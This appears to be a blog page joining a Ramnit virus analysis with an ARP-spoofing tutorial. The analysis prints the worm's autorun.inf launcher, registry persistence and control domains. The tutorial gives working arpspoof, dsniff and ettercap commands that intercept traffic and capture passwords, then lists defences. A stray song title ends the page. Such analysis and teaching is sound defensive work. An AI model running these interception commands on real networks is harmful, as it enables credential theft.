Monday, March 21, 2016

VIRUS.WIN32.RAMNIT.A

by Atlantis on April 12th, 2012 in Malware Descriptions.
Detect: Virus.Win32.Ramnit.a
Platform: Win32
Type: Virus
Size: 103936 bytes
Language: C++
md5: CDF0778E1B80069D137A3E7A0C7C787F
sha1: E1826123B190C1FB3D11BBEA33EF6D1CCEABAD43
Summary
It is a malicious program which infects files on a User's PC.
Technical Details
Spreading over Removable Storage Devices
On all removable storage devices connected to the infected computer, the virus creates the following files:
:\Recycler\S-\.cpl (3584 bytes)
:\Recycler\S-\.exe (56832 bytes)
:\Copy of Shortcut to (1).lnk (691 bytes)
:\Copy of Shortcut to (2).lnk (722 bytes)
:\Copy of Shortcut to (3).lnk (858 bytes)
:\Copy of Shortcut to (4).lnk (867 bytes)
:\autorun.inf (11964 bytes)
where
  •  — is a digit identifier (e.g.: "1-4-83-4678327503-5842818778-105234524-7024"),
  •  — random Latin alphabet sequences (e.g.: "xVgGwSIp", "lwTCZgQP").
The "autorun.inf" file contains a malicious script:
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=\RECYCLER\S-\.exe
shell\explore\command=\RECYCLER\S-\.exe
USEAUTOPLAY=1
shell\Open\command=\RECYCLER\S-\.exe
The script is executed each time the user opens the infected disk using the Windows Explorer if the autoplay function is turned on. Being executed, the script launches the ".exe" file. Shortcuts created by the malicious program are exploits which use the CVE-2010-2568 vulnerability. In the "shell32.dll" library, this vulnerability consists in error of the shortcut processing (lnk and .pif files) and allows launching a code of random Windows libraries when hitting icons to open programs by the Windows Explorer. The code of the ".cpl" library is launched. Being executed, it launches the ".exe" file. The malicious program prevents modifying the files described above and creates them in an endless cycle.
File Infection
The virus infects files with the following extensions:
exe
html
dll
htm
Executive files and Windows dynamic link libraries are infected by adding the virus body in the end of the last PE-section of the target file. With that, an entry point to the program changes in such a way as to allow the virus code to manage it. While infecting the HTML, HTM files, the following script is added in the end of the target document:
Thus, upon each launch, the virus body is saved to the current user's temporary folder as
%Temp%\svchost.exe
and launched for execution.
Payload
Once the infected file is launched, the Trojan decrypts and extracts the following file from its body:
%WorkDir%\Srv.exe
Then, the created file is launched for execution. With that, a copy of the file is created and launched:
%Program Files%\Microsoft\WaterMark.exe
Then, the "WaterMark.exe" process launches an example of the "svchost.exe" system process and injects its code into this process which performs the following actions:
  • Creates a unique identifier with the following name to control the uniqueness of its process in the system:
    Global\SYSTEM_DEMETRA_MAIN
  • Modifies a registry key value to automatically run a malicious software copy created earlier:
    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit" = "%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"
    With that, the copy is launched by the "winlogon.exe" process even if a computer starts in a safe mode.
  • Prevents modifying autorun registry key as well as the "WaterMark.exe" file.
  • Creates a configuration file to store the current settings of the malicious software:
    %System%\dmlconf.dat
  • Visit the following resource to check for a connection to the Internet:
    google.com
  • Realizes the backdoor. To get a list of commands, it connects to the servers:
    tybdtyutjfyvetscev.com
    ervwetyrbuyouiylkdhrbt.com
    tybsyiutnrtvtybdrser.com
    Depending on the command(s) get from the intruder, the backdoor can perform the following actions:
    - upload files to the infected computer and launch them for execution.
    - connect to another server to get commands.
  • The code injected into the address space of the "svchost.exe" process executes a functionality described in the Spreading over Removable Storage Devices and File Infection sections.
Removal Recommendations
To delete a malicious program, proceed through the steps listed below:
  1. Run a full scan of your computer using the Antivirus program with the updated definition database.
  2. Do not launch the EXE, HTM, HTML files and do not reboot your computer until a full scan is complete.
  3. Restore the infected files from the backup copies.
  4. Restore the registry key value (How to Work with System Registry):
    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit" = "userinit.exe"
  5. Delete the following files:
    :\Recycler\S-\.cpl (3584 bytes)
    :\Recycler\S-\.exe (56832 bytes)
    :\Copy of Shortcut to (1).lnk (691 bytes)
    :\Copy of Shortcut to (2).lnk (722 bytes)
    :\Copy of Shortcut to (3).lnk (858 bytes)
    :\Copy of Shortcut to (4).lnk (867 bytes)
    :\autorun.inf (11964 bytes)
    %Temp%\svchost.exe
    %WorkDir%\Srv.exe
    %Program Files%\Microsoft\WaterMark.exe
  6. Delete the original Trojan file (its file name and location depends on the way the Trojan originally penetrated a user’s computer).
  7. Delete an original Trojan file (its location on the infected PC depends on the way the program has been installed on the PC).
  8. Clean the Temporary Internet Files folder which contains infected files

ARP Spoofing using Dsniff Tools and Ettercap

A quick demonstration of ARP Spoofing using Dsniff Tools and Ettercap

     Let's start by using Dug Song's Arpspoof program that comes with his Dsniff package. I use the *nix version but if you look around you may be able to find a Win32 version. The easiest way to run Dsniff is to boot from a BackTrack boot CD. The first thing you should do is make sure packet forwarding is turned on, otherwise our machine will drop all traffic between the hosts we are trying to sniff, causing a denial of service. Some of the tools I use do this automatically (Like Ettercap), but to be sure, you may want to do it yourself. Use the following commands, depending on operating system:

Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward

BSD:
sysctl -w net.inet.ip.forwarding=1

     Now that your computer will forward the traffic you can start ARP Spoofing. Let's assume you want to sniff all traffic between a host and the gateway so you can see the traffic it's sending to the Internet. To get traffic in both directions you would use the following two commands:

arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null


     The "& >/dev/nul" part is there to make it easier to run from one terminal, but you may want to omit it for debugging purposes. Now you can use any package you wish to sniff the connection. To start with I'd recommend using the Sniffer Dsniff that comes along with Arpspoof to sniff for plain text passwords. To start sniffing with Dsniff just drop out to a command shell and type:

dsniff

     As Dsniff finds passwords and usernames it will print them to the screen. To look at all sorts of other traffic I would recommend TCPDump or Wireshark. When you are ready to stop ARP Spoofing issue the following command:

killall arpspoof

     This should kill the two instances of Arpspoof started above.
    Another great tool is Ettercap, the Swiss army knife of ARP Poisoning and password sniffing. I usually use it in non-interactive mode, but by default it has a ncurses interface that some may find easier to use. If you would like to use Ettercap for ARP poisoning instead, the following commands should serve as good examples. If we wanted to target all hosts on the network and sniff traffic between every node, we would use the following command:

ettercap -T -q -M ARP // //

    Be careful with the above command, having all of the traffic on a large network going though one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.1.1, we would use this command:

ettercap -T -q -M ARP /192.168.1.1/ //

If 192.168.1.1 is the gateway, we should be able to see all outgoing traffic. Here are what the command line option flags do:

-T tells Ettercap to use the text interface, I like this option the best as the more GUI modes are rather confusing.
-q tells Ettercap to be more quiet, in other words less verbose.
-M tells Ettercap the MITM (Man in the Middle) method we want to use, in this case ARP poisoning.
For some other things you can do with Ettercap check out my video Fun with Ettercap Filters: The Movie.

Other Tools

     There are many other packages I would like to mention as well. The first is Cain, which Windows users will be much more comfortable with. It has some great functionality and a nice interface. I have a video tutorial on how to use it here:
    If you like pretty GUIs, Cain is the way to go. It does not have as many options as Ettercap, but it's still pretty cool and has some other Windows specific extras built in.
    There are also specialized snuffers for certain kinds of content. Driftnet parses out the images people are seeing as they web surf .I've not done a video on Driftnet, but I have done one on NetworkActive which can also parse out images from web traffic:
    These also sniffers like P0f that let you finger the OS of network traffic passively:
    And that's just the tip of the iceberg when it comes to specialized sniffers.

Mitigating Sniffing Attacks

     There are quite a few ways to mitigate sniffing attacks.

1. Avoid using insecure protocols like Basic HTTP authentication and Telnet. As a matter of fact you should sniff your own network to see what passwords the tools listed above can pick up.
2. If you have to use an insecure protocol, try tunneling it though something to encrypt the sensitive data. I have a video on SSH Dynamic Port Forwarding that show one way to accomplish this.
3. Look into using Static ARP tables between critical workstations and servers. They are more trouble to maintain but limit arpspoofing.
4. Run software like ARPWatch to detect changes in MAC addresses on your network that may point to Sniffers.
5. Try running tools like Sniffdet and Sentinel to detect network cards in promiscuous mode that may be running sniffing software.
6. Have outside laptops using Wi-Fi that come into your facility use a VPN to connect to the network.
7. Lockdown workstations so users can't install sniffing software or boot from a CD like Knoppix.
8. Keep public terminals on a separate LAN from the staff workstations and servers.

I hope you have found this article useful.

Further research:

ARPWatch
http://www-nrg.ee.lbl.gov/ 

Cielo e terra (duet with Dante Thomas)